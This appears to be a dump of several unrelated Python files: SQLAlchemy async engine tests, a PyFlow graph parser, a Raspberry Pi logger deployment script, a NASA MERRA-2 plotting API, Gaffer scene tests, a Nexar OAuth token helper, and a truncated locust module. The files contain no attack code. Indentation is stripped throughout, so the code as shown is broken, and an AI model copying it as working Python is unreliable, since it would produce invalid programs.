we do not provide an asyncio event interface at this time.
"""
__backend__ = True
@async_test
async def test_no_async_listeners(self, async_engine):
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(async_engine, "before_cursor_execute", mock.Mock())
conn = await async_engine.connect()
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(conn, "before_cursor_execute", mock.Mock())
@async_test
async def test_sync_before_cursor_execute_engine(self, async_engine):
canary = mock.Mock()
event.listen(async_engine.sync_engine, "before_cursor_execute", canary)
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[mock.call(sync_conn, mock.ANY, "select 1", (), mock.ANY, False)],
)
@async_test
async def test_sync_before_cursor_execute_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
event.listen(
async_engine.sync_engine, "before_cursor_execute", canary
)
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[mock.call(sync_conn, mock.ANY, "select 1", (), mock.ANY, False)],
)
@async_test
async def test_event_on_sync_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
event.listen(conn.sync_connection, "begin", canary)
async with conn.begin():
eq_(
canary.mock_calls,
[mock.call(conn.sync_connection)],
)
class AsyncInspection(EngineFixture):
__backend__ = True
@async_test
async def test_inspect_engine(self, async_engine):
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncEngine is currently not supported.",
):
inspect(async_engine)
@async_test
async def test_inspect_connection(self, async_engine):
async with async_engine.connect() as conn:
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncConnection is currently not supported.",
):
inspect(conn)
class AsyncResultTest(EngineFixture):
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_all(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
all_ = await result.all()
if filter_ == "mappings":
eq_(
all_,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
all_,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_aiter(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
rows = []
async for row in result:
rows.append(row)
if filter_ == "mappings":
eq_(
rows,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
rows,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(rows, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations((None,), ("mappings",), argnames="filter_")
@async_test
async def test_keys(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
eq_(result.keys(), ["user_id", "user_name"])
await result.close()
@async_test
async def test_unique_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
union_all(select(users), select(users)).order_by(
users.c.user_id
)
)
all_ = await result.unique().all()
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@async_test
async def test_columns_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
all_ = await result.columns(1).all()
eq_(all_, [("name%d" % i,) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_partitions(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
check_result = []
async for partition in result.partitions(5):
check_result.append(partition)
if filter_ == "mappings":
eq_(
check_result,
[
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(a, b)
]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
elif filter_ == "scalars":
eq_(
check_result,
[
["name%d" % i for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
else:
eq_(
check_result,
[
[(i, "name%d" % i) for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_one_success(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).limit(1).order_by(users.c.user_name)
)
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars()
u1 = await result.one()
if filter_ == "mappings":
eq_(u1, {"user_id": 1, "user_name": "name%d" % 1})
elif filter_ == "scalars":
eq_(u1, 1)
else:
eq_(u1, (1, "name%d" % 1))
@async_test
async def test_one_no_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name == "nonexistent")
)
with expect_raises_message(
exc.NoResultFound, "No row was found when one was required"
):
await result.one()
@async_test
async def test_one_multi_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name.in_(["name3", "name5"]))
)
with expect_raises_message(
exc.MultipleResultsFound,
"Multiple rows were found when exactly one was required",
):
await result.one()
@testing.combinations(
("scalars",), ("stream_scalars",), argnames="filter_"
)
@async_test
async def test_scalars(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
if filter_ == "scalars":
result = (await conn.scalars(select(users))).all()
elif filter_ == "stream_scalars":
result = await (await conn.stream_scalars(select(users))).all()
eq_(result, list(range(1, 20)))
class TextSyncDBAPI(fixtures.TestBase):
def test_sync_dbapi_raises(self):
with expect_raises_message(
exc.InvalidRequestError,
"The asyncio extension requires an async driver to be used.",
):
create_async_engine("sqlite:///:memory:")
@testing.fixture
def async_engine(self):
engine = create_engine("sqlite:///:memory:", future=True)
engine.dialect.is_async = True
return _async_engine.AsyncEngine(engine)
@async_test
@combinations(
lambda conn: conn.exec_driver_sql("select 1"),
lambda conn: conn.stream(text("select 1")),
lambda conn: conn.execute(text("select 1")),
argnames="case",
)
async def test_sync_driver_execution(self, async_engine, case):
with expect_raises_message(
exc.AwaitRequired,
"The current operation required an async execution but none was",
):
async with async_engine.connect() as conn:
await case(conn)
@async_test
async def test_sync_driver_run_sync(self, async_engine):
async with async_engine.connect() as conn:
res = await conn.run_sync(
lambda conn: conn.scalar(text("select 1"))
)
assert res == 1
assert await conn.run_sync(lambda _: 2) == 2
class AsyncProxyTest(EngineFixture, fixtures.TestBase):
@async_test
async def test_get_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
is_(trans.connection, conn)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_nested_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
n1 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n1)
n2 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n2)
await n2.commit()
is_(conn.get_nested_transaction(), n1)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_connection(self, async_engine):
async with async_engine.connect() as conn:
is_(
AsyncConnection._retrieve_proxy_for_target(
conn.sync_connection
),
conn,
)
def test_regenerate_connection(self, connection):
async_connection = AsyncConnection._retrieve_proxy_for_target(
connection
)
a2 = AsyncConnection._retrieve_proxy_for_target(connection)
is_(async_connection, a2)
is_not(async_connection, None)
is_(async_connection.engine, a2.engine)
is_not(async_connection.engine, None)
@testing.requires.predictable_gc
@async_test
async def test_gc_engine(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
eq_(len(ReversibleProxy._proxy_objects), 0)
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
@testing.requires.predictable_gc
@async_test
async def test_gc_conn(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
async with async_engine.connect() as conn:
eq_(len(ReversibleProxy._proxy_objects), 2)
async with conn.begin() as trans:
eq_(len(ReversibleProxy._proxy_objects), 3)
del trans
del conn
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
def test_regen_conn_but_not_engine(self, async_engine):
sync_conn = async_engine.sync_engine.connect()
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
async_conn2 = AsyncConnection._retrieve_proxy_for_target(sync_conn)
is_(async_conn, async_conn2)
is_(async_conn.engine, async_engine)
def test_regen_trans_but_not_conn(self, async_engine):
sync_conn = async_engine.sync_engine.connect()
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
trans = sync_conn.begin()
async_t1 = async_conn.get_transaction()
is_(async_t1.connection, async_conn)
is_(async_t1.sync_transaction, trans)
async_t2 = async_conn.get_transaction()
is_(async_t1, async_t2)
|
graphUiParser.py | ## Copyright 2015-2019 Ilgar Lunin, Pedro Cabrera
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import os
import sys
import json
import threading
import time
from Qt.QtWidgets import *
from Qt import QtGui
from Qt import QtCore
from PyFlow import INITIALIZE
from PyFlow.Core.Common import *
from PyFlow.Core.GraphManager import GraphManager
from PyFlow.UI.Canvas.UINodeBase import getUINodeInstance
from PyFlow.UI.Utils.stylesheet import editableStyleSheet
import PyFlow.UI.resources
def run(filePath):
app = QApplication(sys.argv)
app.setStyle(QStyleFactory.create("plastique"))
app.setStyleSheet(editableStyleSheet().getStyleSheet())
msg = QMessageBox()
msg.setWindowIcon(QtGui.QIcon(":/LogoBpApp.png"))
msg.setIcon(QMessageBox.Critical)
if os.path.exists(filePath):
with open(filePath, 'r') as f:
data = json.load(f)
# Window to display inputs
prop = QDialog()
prop.setLayout(QVBoxLayout())
prop.setWindowTitle(filePath)
prop.setWindowIcon(QtGui.QIcon(":/LogoBpApp.png"))
# Initalize packages
try:
INITIALIZE()
man = GraphManager()
man.deserialize(data)
grph = man.findRootGraph()
inputs = grph.getNodesByClassName("graphInputs")
# If no GraphInput Nodes Exit propgram
if len(inputs) > 0:
for inp in inputs:
uiNode = getUINodeInstance(inp)
uiNodeJsonTemplate = inp.serialize()
uiNodeJsonTemplate["wrapper"] = inp.wrapperJsonData
uiNode.postCreate(uiNodeJsonTemplate)
cat = uiNode.createOutputWidgets(prop.layout(), inp.name)
prop.show()
# fake main loop
stopEvent = threading.Event()
def programLoop(stopEvent):
while not stopEvent.is_set():
man.Tick(deltaTime=0.02)
time.sleep(0.02)
t = threading.Thread(target=programLoop, args=(stopEvent,))
t.start()
def quitEvent():
stopEvent.set()
t.join()
app.aboutToQuit.connect(quitEvent)
else:
msg.setInformativeText(filePath)
msg.setDetailedText("The file doesn't containt graphInputs nodes")
msg.setWindowTitle("PyFlow Ui Graph Parser")
msg.setStandardButtons(QMessageBox.Ok)
msg.show()
except Exception as e:
msg.setText("Error reading Graph")
msg.setInformativeText(filePath)
msg.setDetailedText(str(e))
msg.setWindowTitle("PyFlow Ui Graph Parser")
msg.setStandardButtons(QMessageBox.Ok)
msg.show()
else:
msg.setText("File Not Found")
msg.setInformativeText(filePath)
msg.setWindowTitle("PyFlow Ui Graph Parser")
msg.setStandardButtons(QMessageBox.Ok)
msg.show()
try:
sys.exit(app.exec_())
except Exception as e:
print(e)
|
main.py | import sys
import os
import yaml
import logging
import multiprocessing
from irrad_control.utils.proc_manager import ProcessManager
from ps_monitor.monitor import main as DoTheMonitoringThing
from ps_monitor import logger
logging.getLogger().setLevel("INFO")
def _configure_rpi_server(config, pm):
# Prepare RPi
ip = config["ip"]
# Connect
pm.connect_to_server(hostname=ip, username='pi')
# Configure
pm.configure_server(hostname=ip, branch="development", git_pull=False)
def main():
path_to_config_file = sys.argv[-1]
config = logger.load_config(path_to_config_file)
pm = ProcessManager()
# 1) Configure all RPi s
for rpi in config['rpis']:
logger.check_config(config['rpis'][rpi])
_configure_rpi_server(config=config['rpis'][rpi], pm=pm)
hostname = config['rpis'][rpi]["ip"]
# Create config yaml per RPi
with open("{}_config.yaml".format(rpi), "w") as rpi_config:
yaml.safe_dump(data=config['rpis'][rpi], stream=rpi_config)
# Create start script per RPi
cmd = 'echo "{}"'.format("source /home/pi/miniconda2/bin/activate; python logger.py %s_config.yaml" % rpi) + ' > ${HOME}/start_logger.sh'
pm._exec_cmd(hostname, cmd)
# Copy config_yaml and logger.py to home folder of Rpi
pm.copy_to_server(hostname, os.path.join(os.getcwd(), "{}_config.yaml".format(rpi)), "/home/pi/{}_config.yaml".format(rpi))
pm.copy_to_server(hostname, os.path.join(os.path.dirname(__file__), 'logger.py'), "/home/pi/logger.py")
pm._exec_cmd(hostname, 'nohup bash /home/pi/start_logger.sh &')
workers = []
for rpi in config["rpis"]:
config["rpis"][rpi]["log_type"] = "rw"
worker = multiprocessing.Process(target=logger.logger, kwargs=config["rpis"][rpi])
workers.append(worker)
worker.start()
# Step 1) is done here
# Step 2: move the logger.py + config + start_script to all RPis
if config['monitor']:
worker = multiprocessing.Process(target=DoTheMonitoringThing, args=(config["rpis"],))
workers.append(worker)
worker.start()
try:
for w in workers:
w.join()
except KeyboardInterrupt:
for w in workers:
w.terminate()
if __name__ == "__main__":
main()
|
app.py | import logging
import os
import sys
from sys import stdout
import json
from unicodedata import name
import urllib3
import certifi
import io
from typing import List
import requests
from time import sleep
from fastapi import FastAPI
import xarray as xr
from models import MerraClientRequest
import matplotlib.pyplot as plt
import uvicorn
from fastapi.responses import StreamingResponse
from threading import Thread
logger = logging.getLogger()
log_fhandler = logging.FileHandler('ingestor.log', mode='a')
log_shandler = logging.StreamHandler(stdout)
formatter = logging.Formatter(
'%(levelname)s %(asctime)s - %(message)s')
log_shandler.setFormatter(formatter)
log_fhandler.setFormatter(formatter)
logger.addHandler(log_fhandler)
logger.addHandler(log_shandler)
app = FastAPI()
# Create a urllib PoolManager instance to make requests.
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED',ca_certs=certifi.where())
# Set the URL for the GES DISC subset service endpoint
url = 'https://disc.gsfc.nasa.gov/service/subset/jsonwsp'
# This method POSTs formatted JSON WSP requests to the GES DISC endpoint URL
# It is created for convenience since this task will be repeated more than once
def get_http_data(request):
hdrs = {'Content-Type': 'application/json',
'Accept' : 'application/json'}
data = json.dumps(request)
r = http.request('POST', url, body=data, headers=hdrs)
response = json.loads(r.data)
# Check for errors
if response['type'] == 'jsonwsp/fault' :
print('API Error: faulty %s request' % response['methodname'])
sys.exit(1)
return response
def create_subset_request(begTime, endTime):
# Create the subset request
product = 'M2I3NPASM_5.12.4'
varNames =['T', 'RH', 'O3']
dimName = 'lev'
dimVals = [1,4,7,13,17,19,21,22,23,24,25,26,27,29,30,31,32,33,35,36,37]
# Construct the list of dimension name:value pairs to specify the desired subset
dimSlice = []
for i in range(len(dimVals)):
dimSlice.append({'dimensionId': dimName, 'dimensionValue': dimVals[i]})
subset_request = {
'methodname': 'subset',
'type': 'jsonwsp/request',
'version': '1.0',
'args': {
'role' : 'subset',
'start' : begTime,
'end' : endTime,
'box' : [-180, -80, 180, 80],
'crop' : True,
'data': [{'datasetId': product,
'variable' : varNames[0],
'slice': dimSlice
},
{'datasetId': product,
'variable' : varNames[1],
'slice' : dimSlice
},
{'datasetId': product,
'variable' : varNames[2],
'slice': dimSlice
}]
}
}
return subset_request
def get_subset_data(start_time, end_time):
# Submit the subset request to the GES DISC Server
response = get_http_data(create_subset_request(start_time, end_time))
# Report the JobID and initial status
myJobId = response['result']['jobId']
print('Job ID: '+myJobId)
print('Job status: '+response['result']['Status'])
status_request = {
'methodname': 'GetStatus',
'version': '1.0',
'type': 'jsonwsp/request',
'args': {'jobId': myJobId}
}
# Check on the job status after a brief nap
while response['result']['Status'] in ['Accepted', 'Running']:
sleep(1)
response = get_http_data(status_request)
status = response['result']['Status']
percent = response['result']['PercentCompleted']
print ('Job status: %s (%d%c complete)' % (status,percent,'%'))
if response['result']['Status'] == 'Succeeded' :
print ('Job Finished: %s' % response['result']['message'])
else :
print('Job Failed: %s' % response['fault']['code'])
sys.exit(1)
# Retrieve a plain-text list of results in a single shot using the saved JobID
batchsize = 20
results_request = {
'methodname': 'GetResult',
'version': '1.0',
'type': 'jsonwsp/request',
'args': {
'jobId': myJobId,
'count': batchsize,
'startIndex': 0
}
}
# Retrieve the results in JSON in multiple batches
# Initialize variables, then submit the first GetResults request
# Add the results from this batch to the list and increment the count
results = []
count = 0
response = get_http_data(results_request)
count = count + response['result']['itemsPerPage']
results.extend(response['result']['items'])
# Increment the startIndex and keep asking for more results until we have them all
total = response['result']['totalResults']
while count < total :
results_request['args']['startIndex'] += batchsize
response = get_http_data(results_request)
count = count + response['result']['itemsPerPage']
results.extend(response['result']['items'])
# Check on the bookkeeping
print('Retrieved %d out of %d expected items' % (len(results), total))
# Sort the results into documents and URLs
docs = []
urls = []
for item in results:
try:
if item['start'] and item['end'] : urls.append(item)
except:
docs.append(item)
return urls
#Download datasets from the GES DISC server using urls
def download_data(urls):
# Use the requests library to submit the HTTP_Services URLs and write out the results.
print('\nHTTP_services output:')
files = []
for item in urls :
URL = item['link']
#Check if the file exists in the local directory, if yes keep it, if not download it
if os.path.isfile('./netCDF/' + item['label']):
print('File %s already exists' % item['label'])
files.append(item['label'])
continue
result = requests.get(URL)
try:
result.raise_for_status()
outfn = item['label']
files.append(outfn)
f = open(f'./netCDF/{outfn}','wb')
f.write(result.content)
f.close()
print(outfn, "is downloaded")
except:
print('Error! Status code is %d for this URL:\n%s' % (result.status_code,URL))
print('Help for downloading data is at https://disc.gsfc.nasa.gov/data-access')
print('Downloading is done and find the downloaded files in your current working directory')
return files
def do_plot(file, parameter):
ds = xr.open_dataset('./netCDF/'+file)
if parameter == 'T':
figu = ds.T.isel(lev = 10).mean(dim='time')
elif parameter == 'RH':
figu = ds.RH.isel(lev = 10).mean(dim='time')
elif parameter == 'O3':
figu = ds.O3.isel(lev = 10).mean(dim='time')
if parameter == 'T':
f = plt.subplots(figsize = (31.54,20))
im = plt.imshow(figu, alpha=0.3, cmap = 'jet_r')
plt.axis('off')
# figu.plot()
plt.savefig(file+'.png', transparent = True, bbox_inches='tight', pad_inches=0)
bytes_image = io.BytesIO()
plt.savefig(bytes_image, format='png', transparent=True, bbox_inches='tight', pad_inches=0)
bytes_image.seek(0)
return bytes_image
else:
f = plt.subplots(figsize = (31.54,20))
im = plt.imshow(figu, alpha=0.3, cmap = 'jet')
plt.axis('off')
# figu.plot()
plt.savefig(file+'.png', transparent = True, bbox_inches='tight', pad_inches=0)
bytes_image = io.BytesIO()
plt.savefig(bytes_image, format='png', transparent=True, bbox_inches='tight', pad_inches=0)
bytes_image.seek(0)
return bytes_image
def convert_files(files):
for file in files:
ds = xr.open_dataset(f'./netCDF/{file}')
# check if zarr file exists
if os.path.isfile(f'./zarr/{file}.zarr'):
logger.info(f'File {file}.zarr already exists')
continue
# ds.to_zarr('./zarr/'+file.replace('.nc','.zarr'))
ds.close()
logger.info('Converted files to zarr format')
@app.post('/')
async def serve(request: MerraClientRequest) -> List[float]:
try:
logger.debug(f'Incoming request: {request}')
urls_ = get_subset_data(request.startdate, request.enddate)
files = download_data(urls_)
if files :
try:
bytes_image = do_plot(files[0], request.parameter)
thread = Thread(target=convert_files(files))
thread.start()
return StreamingResponse(content=bytes_image, media_type='image/png')
except ValueError as e:
print(e)
else:
print('No files are downloaded or there is no data in the time range')
sys.exit(1)
except Exception as e:
logger.error(e)
return e
if __name__ == "__main__":
uvicorn.run(app, host='0.0.0.0', port=8080)
|
SceneNodeTest.py | ##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import IECore
import Gaffer
import GafferTest
import GafferScene
import GafferSceneTest
class SceneNodeTest( GafferTest.TestCase ) :
def testRootConstraints( self ) :
# we don't allow the root of the scene ("/") to carry objects, transforms,
# or attributes. if we did, then there wouldn't be a sensible way of merging
# them (particularly transforms) when a Group node has multiple inputs.
# it's also pretty confusing to have stuff go on at the root level,
# particularly as the root isn't well represented in the SceneHierarchy editor,
# and applications like maya don't have stuff happening at the root
# level either. we achieve this by having the SceneNode simply not
# call the various processing functions for the root.
node = GafferSceneTest.CompoundObjectSource()
node["in"].setValue(
IECore.CompoundObject( {
"object" : IECore.SpherePrimitive()
} )
)
self.assertEqual( node["out"].object( "/" ), IECore.NullObject() )
node = GafferSceneTest.CompoundObjectSource()
node["in"].setValue(
IECore.CompoundObject( {
"transform" : IECore.M44fData( IECore.M44f.createTranslated( IECore.V3f( 1 ) ) )
} )
)
self.assertEqual( node["out"].transform( "/" ), IECore.M44f() )
node = GafferSceneTest.CompoundObjectSource()
node["in"].setValue(
IECore.CompoundObject( {
"attributes" : IECore.CompoundObject()
} )
)
self.assertEqual( node["out"].attributes( "/" ), IECore.CompoundObject() )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed( GafferScene, namesToIgnore = set( ( "IECore::PathMatcherData", ) ) )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( GafferScene )
def testRootAttributes( self ) :
# create node inheriting from SceneNode:
node = GafferScene.CustomAttributes()
node["attributes"].addOptionalMember( "user:foobar", True, enabled = True )
# scene nodes always have passthrough behaviour for attributes at the root, so this particular one should return an empty compound object:
context = Gaffer.Context()
context.set( "scene:path", IECore.InternedStringVectorData([]) )
with context:
self.assertEqual( node["out"]["attributes"].getValue(), IECore.CompoundObject() )
# unless the caching system is misbehaving, it should return the attribute values we asked for at other locations:
context.set( "scene:path", IECore.InternedStringVectorData(["yup"]) )
with context:
self.assertEqual( node["out"]["attributes"].getValue(), IECore.CompoundObject({'user:foobar':IECore.BoolData( 1 )}) )
def testRootObject( self ):
# okie dokie - create a sphere node and check it's generating a sphere in the correct place:
sphere = GafferScene.Sphere()
context = Gaffer.Context()
context.set("scene:path", IECore.InternedStringVectorData(["sphere"]) )
with context:
self.assertEqual( sphere["out"]["object"].getValue().typeId(), IECore.MeshPrimitive.staticTypeId() )
# right, now subtree it. If the cache is behaving itself, then there shouldn't be an object at the root of the
# resulting scene, cuz that aint allowed.
subTree = GafferScene.SubTree()
subTree["in"].setInput( sphere["out"] )
subTree["root"].setValue("sphere")
context.set("scene:path", IECore.InternedStringVectorData([]) )
with context:
self.assertEqual( subTree["out"]["object"].getValue().typeId(), IECore.NullObject.staticTypeId() )
def testRootTransform( self ):
# okie dokie - create a sphere node and check it's generating a sphere in the correct place:
sphere = GafferScene.Sphere()
sphere["transform"]["translate"]["x"].setValue( 1.0 )
sphere["transform"]["translate"]["y"].setValue( 2.0 )
sphere["transform"]["translate"]["z"].setValue( 3.0 )
context = Gaffer.Context()
context.set("scene:path", IECore.InternedStringVectorData(["sphere"]) )
with context:
self.assertEqual( sphere["out"]["transform"].getValue(), IECore.M44f.createTranslated( IECore.V3f( 1,2,3 ) ) )
# right, now subtree it. If the cache is behaving itself, then the transform at the root of the
# resulting scene should be set to identity.
subTree = GafferScene.SubTree()
subTree["in"].setInput( sphere["out"] )
subTree["root"].setValue("sphere")
context.set("scene:path", IECore.InternedStringVectorData([]) )
with context:
self.assertEqual( subTree["out"]["transform"].getValue(), IECore.M44f() )
def testCacheThreadSafety( self ) :
p1 = GafferScene.Plane()
p1["divisions"].setValue( IECore.V2i( 50 ) )
p2 = GafferScene.Plane()
p2["divisions"].setValue( IECore.V2i( 51 ) )
g = GafferScene.Group()
g["in"].setInput( p1["out"] )
g["in1"].setInput( p2["out"] )
# not enough for both objects - will cause cache thrashing
Gaffer.ValuePlug.setCacheMemoryLimit( p1["out"].object( "/plane" ).memoryUsage() )
exceptions = []
def traverser() :
try :
GafferSceneTest.traverseScene( g["out"] )
except Exception, e :
exceptions.append( e )
threads = []
for i in range( 0, 10 ) :
thread = threading.Thread( target = traverser )
threads.append( thread )
thread.start()
for thread in threads :
thread.join()
for e in exceptions :
raise e
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferScene )
def setUp( self ) :
self.__previousCacheMemoryLimit = Gaffer.ValuePlug.getCacheMemoryLimit()
def tearDown( self ) :
Gaffer.ValuePlug.setCacheMemoryLimit( self.__previousCacheMemoryLimit )
if __name__ == "__main__":
unittest.main()
|
nexar_token.py | """Main entry point to the service."""
import base64
import hashlib
import os
import re
import webbrowser
from multiprocessing import Process
from urllib.parse import parse_qs, urlparse
import requests
from oauthlib.oauth2 import BackendApplicationClient
from oauthlib.oauth2.rfc6749.errors import MissingTokenError
from requests_oauthlib import OAuth2Session
from local_service import main
PROD_TOKEN_URL = "https://identity.nexar.com/connect/token"
REDIRECT_URI = "http://localhost:3000/login"
AUTHORITY_URL = "https://identity.nexar.com/connect/authorize"
def get_token(client_id, client_secret):
"""Return the Nexar token from the client_id and client_secret provided."""
if not client_id or not client_secret:
raise Exception("client_id and/or client_secret are empty")
client = BackendApplicationClient(client_id=client_id)
oauth = OAuth2Session(client=client)
token = {}
try:
token = oauth.fetch_token(
token_url=PROD_TOKEN_URL,
client_id=client_id,
client_secret=client_secret,
include_client_id=True,
)
except MissingTokenError:
raise
return token
def get_token_with_login(client_id, client_secret, scope):
"""Open the Nexar authorization url from the client_id and scope provided."""
if not client_id or not client_secret:
raise Exception("client_id and/or client_secret are empty")
if not scope:
raise Exception("scope is empty")
token = {}
scope_list = ["openid", "profile", "email", "user.details"] + scope
# Start the local service
server = Process(target=main)
server.daemon = True
server.start()
# PCKE code verifier and challenge
code_verifier = base64.urlsafe_b64encode(os.urandom(40)).decode("utf-8")
code_verifier = re.sub("[^a-zA-Z0-9]+", "", code_verifier)
code_challenge = hashlib.sha256(code_verifier.encode("utf-8")).digest()
code_challenge = base64.urlsafe_b64encode(code_challenge).decode("utf-8")
code_challenge = code_challenge.replace("=", "")
try:
# Request login page
oauth = OAuth2Session(client_id, redirect_uri=REDIRECT_URI, scope=scope_list)
authorization_url, _ = oauth.authorization_url(
url=AUTHORITY_URL,
code_challenge=code_challenge,
code_challenge_method="S256",
)
authorization_url = authorization_url.replace("+", "%20")
# Obtain redirect response
webbrowser.open_new(authorization_url)
redirect_response = input(
"\nPlease authorize access and enter the redirect URL: "
).strip()
# Terminate the local service because no longer needed
server.terminate()
redirect_params = parse_qs(urlparse(redirect_response).query)
auth_code = redirect_params["code"][0]
token = requests.post(
url=PROD_TOKEN_URL,
data={
"grant_type": "authorization_code",
"client_id": client_id,
"client_secret": client_secret,
"redirect_uri": redirect_response,
"code": auth_code,
"code_verifier": code_verifier,
},
allow_redirects=False,
).json()
except Exception:
raise
return token
|
locusts.py | # encoding: utf-8
import io
import multiprocessing
import os
import sys
from httprunner.logger import color_print
from httprunner import loader
from locust.main import main
def parse_locustfile(file_path):
""" parse testcase file and return locustfile path.
if file_path is a Python file, assume it is a locustfile
if file_path is a YAML/JSON file, convert it to locustfile
"""
if not os.path.isfile(file_path):
color_print("file path invalid, exit.", "RED")
sys.exit(1)
file_suffix = os.path.splitext(file_path)[1]
if file_suffix == ".py":
locustfile_path = file_path
elif file_suffix in ['.yaml', '.yml', '.json']:
locustfile_path = gen_locustfile(file_path)
else:
# '' or other suffix
color_print("file type should be YAML/JSON/Python, exit.", "RED")
sys.exit(1)
return locustfile_path
def gen_locustfile(testcase_file_path):
""" generate locustfile from template.
